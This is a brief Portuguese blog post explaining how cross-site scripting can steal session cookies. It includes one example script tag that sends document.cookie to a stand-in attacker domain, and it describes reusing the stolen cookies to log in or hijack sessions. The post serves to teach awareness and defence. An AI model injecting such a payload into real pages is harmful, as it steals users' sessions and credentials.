A utilização das cookies, responsáveis pela manutenção dos dados associados a um utilizador tais como a sessionID e/ou tickets de autenticação, é outra área sensível de ser atacada.
Imaginem que um hacker descobre uma vulnerabilidade em uma página web (site, forum, guestbook, etc) e consegue colocar o seguinte código:
<script> location.href=http://www.dominiohacker.com/getCookie.aspx?cookie=+escape(document.cookie)</script>
Quando este script é injectado em um página web, o browser enviará todos os cookies para a localização indicada. A página do hacker poderá guardar os referidos cookies e redirecionar novamente a página para o servidor original. A partir desse momento o hacker poderá utilizar os cookies para efectuar o login ao servidor original ou poderá usa-los para atacar uma sessão.
Como evitar que isto aconteça ?
Continua em : [ http://rbfigueira.net/Post.aspx?postID=180 ]
posted on Tuesday, May 29, 2007 11:48 AM